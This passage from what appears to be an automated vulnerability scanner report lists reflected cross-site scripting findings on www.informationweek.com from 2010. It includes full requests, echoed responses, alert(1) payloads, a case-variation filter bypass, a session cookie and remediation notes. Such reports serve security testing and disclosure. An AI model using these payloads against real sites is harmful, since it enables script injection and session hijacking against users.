GET /blog/main/archives/wolfes_den8aebb'-alert(1)-'39925577aae/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59100
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/wolfes_den8aebb'-alert(1)-'39925577aae/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=978005623;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425a1"><a>15597961f2f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/wolfes_den/index.html425a1"><a>15597961f2f HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:38 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:38 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59262
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/wolfes_den/index425a1"><a>15597961f2f;kvarticleid=;kvauthor=;loc=300;grp=58870447" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3837f'-alert(1)-'9c80f4005af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/wolfes_den/index.html3837f'-alert(1)-'9c80f4005af HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59524
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/wolfes_den/index3837f'-alert(1)-'9c80f4005af;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=715452107;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7dae'-alert(1)-'138347fb928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud-computingc7dae'-alert(1)-'138347fb928/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29988
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/cloud-computingc7dae'-alert(1)-'138347fb928/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=767902195;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d15df"><script>alert(1)</script>0a7a7efc593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud-computingd15df"><script>alert(1)</script>0a7a7efc593/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:51 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:51 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30261
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/cloud-computingd15df"><script>alert(1)</script>0a7a7efc593/;kvarticleid=;kvauthor=;loc=300;grp=201167065" target="_blank"> ...[SNIP]...
3.663. http://www.informationweek.com/cloud-computing/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.informationweek.com
Path: /cloud-computing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ef7"><script>alert(1)</script>ea970e59d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud-computing/?25ef7"><script>alert(1)</script>ea970e59d30=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:38 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:38 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 66425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <form method="post" name="submitPoll" action="/cloud-computing/index.jhtml?25ef7"><script>alert(1)</script>ea970e59d30=1&_DARGS=/cloud-computing/homepage_parts/showQuestionPoll.jhtml"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f086'-alert(1)-'ef99f8662cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3f086'-alert(1)-'ef99f8662cb/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29766
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/3f086'-alert(1)-'ef99f8662cb/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=67429215;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd76"><img%20src%3da%20onerror%3dalert(1)>a873248578 was submitted in the REST URL parameter 1. This input was echoed as 6bd76"><img src=a onerror=alert(1)>a873248578 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /6bd76"><img%20src%3da%20onerror%3dalert(1)>a873248578/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30040
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/6bd76"><img src=a onerror=alert(1)>a873248578/;kvarticleid=;kvauthor=;loc=300;grp=765593702" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191d3'-alert(1)-'345263fe3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global-cio191d3'-alert(1)-'345263fe3a/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29904
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/global-cio191d3'-alert(1)-'345263fe3a/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=561276712;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a88f"><script>alert(1)</script>2669a8ee466 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /global-cio4a88f"><script>alert(1)</script>2669a8ee466/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30186
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/global-cio4a88f"><script>alert(1)</script>2669a8ee466/;kvarticleid=;kvauthor=;loc=300;grp=199227997" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c497"%20style%3dx%3aexpression(alert(1))%20c3944caa6b was submitted in the REST URL parameter 1. This input was echoed as 1c497" style=x:expression(alert(1)) c3944caa6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /government1c497"%20style%3dx%3aexpression(alert(1))%20c3944caa6b/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:32 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:32 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30182
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/government1c497" style=x:expression(alert(1)) c3944caa6b/;kvarticleid=;kvauthor=;loc=300;grp=811755908" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f975e'-alert(1)-'e1456463cfe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /governmentf975e'-alert(1)-'e1456463cfe/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29918
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/governmentf975e'-alert(1)-'e1456463cfe/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=447361092;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be156"><script>alert(1)</script>af0b013896d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /healthcarebe156"><script>alert(1)</script>af0b013896d/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30174
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/healthcarebe156"><script>alert(1)</script>af0b013896d/;kvarticleid=;kvauthor=;loc=300;grp=99570369" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa7fb</script><a%20b%3dc>5e712078002 was submitted in the REST URL parameter 1. This input was echoed as aa7fb</script><a b=c>5e712078002 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthcareaa7fb</script><a%20b%3dc>5e712078002/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:24 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:24 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30010
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/healthcareaa7fb</script><a b=c>5e712078002/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=280410015;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1f71"><ScRiPt>alert(1)</ScRiPt>df0da315397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /d1f71"><ScRiPt>alert(1)</ScRiPt>df0da315397/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:19:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:19:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30036
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/d1f71"><ScRiPt>alert(1)</ScRiPt>df0da315397/;kvarticleid=;kvauthor=;loc=300;grp=147887707" target="_blank"> ...[SNIP]...
